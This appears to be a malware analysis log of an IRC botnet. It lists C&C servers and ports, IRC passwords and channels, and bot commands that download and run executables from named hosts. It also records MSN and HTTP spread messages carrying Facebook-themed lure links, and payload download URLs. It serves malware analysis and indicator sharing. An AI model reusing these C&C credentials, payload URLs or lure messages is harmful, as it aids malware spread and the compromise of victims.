Remote Host: 149.3.130.4
Port Number: 6667
PASS KCA
178.162.244.239:6667
* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://image-facebook.byinter.net/av.txt
o http://85.25.152.106/~aydin/beta.exe
NICK X{KCA|VNC}44689
USER aaqsf “fo9.net” “rage” :aaqsf
JOIN #vnc KCA
PONG irc.botnet.net
NICK KCA[iRooT-XP-USA]529225
USER 5292 “” “TsGh” :5292
JOIN #botnet KCA
PONG :irc.botnet.net
NICK n{US|XPa}brjxndz
USER brjxndz 0 0 :brjxndz
JOIN #BETA KCA
PRIVMSG #beta :[MSN]: Updated MSN spread message to “This is in the image that you? http://www.sohbetcell.net/images.php?id=”
Nick: KCA{AUT-XP}992432
Username: 9924
Server Pass: KCA
Joined Channel: #KCA with Password KCAt
Private Message to Channel #KCA: “www.metalteam.oRg”
PRIVMSG #aryan :[AryaN]: Successfully Executed Process: “C:\Documents and Settings\UserName\Application Data\20510691721569.exe”
NICK n{US|XPa}cbdzfrs
USER cbdzfrs 0 0 :cbdzfrs
JOIN #BETA KCA
JOIN #X,#XX,#XXX
PRIVMSG #X :[MSN]: Updated MSN spread interval to “3”
PRIVMSG #X :[MSN]: Updated MSN spread message to “:O hahaha! http://image-facebook.byinter.net/profile.php?id=PIC-4024512198947-Facebook.JPG”
PRIVMSG #X :[HTTP]: Updated HTTP spread interval to “4”
PRIVMSG #X :[HTTP]: Updated HTTP spread message to “;) http://image-facebook.byinter.net/profile.php?id=PIC-4024512198947-Facebook.JPG”
PRIVMSG #BETA :[DNS]: Blocked 0 domain(s) – Redirected 1 domain(s)
PONG :irc.botnet.net
NICK New{US-XP-x86}1320867
USER 5777444 “” “5777444” :5777444
MODE New{US-XP-x86}1320867 +iMm
JOIN #aryan KCA
PRIVMSG #aryan :[AryaN]: Downloading File: “http://85.25.152.106/~aydin/beta.exe”
PRIVMSG #aryan :[AryaN]: Successfully Downloaded File To: “C:\Documents and Settings\UserName\Application Data\20510691721569.exe”
UPDATE:
Download URLs
http://199.15.234.7/ (api.wipmania.com)
http://85.25.152.106/~aydin/av.txt (85.25.152.106)
http://85.25.152.106/~aydin/mer.exe (85.25.152.106)
http://85.25.152.106/~aydin/mer.exe (85.25.152.106)
Outgoing connection to remote server: api.wipmania.com TCP port 80
C&C Server: 88.255.116.47:1453
Server Password:
Username: htkzlwt
Nickname: n{DE|XPa}htkzlwt
Channel: #XXX (Password: KCA)
Channeltopic: :!mdns http://85.25.152.106/~aydin/av.txt !j #X
Hosting info:
http://whois.domaintools.com/149.3.130.4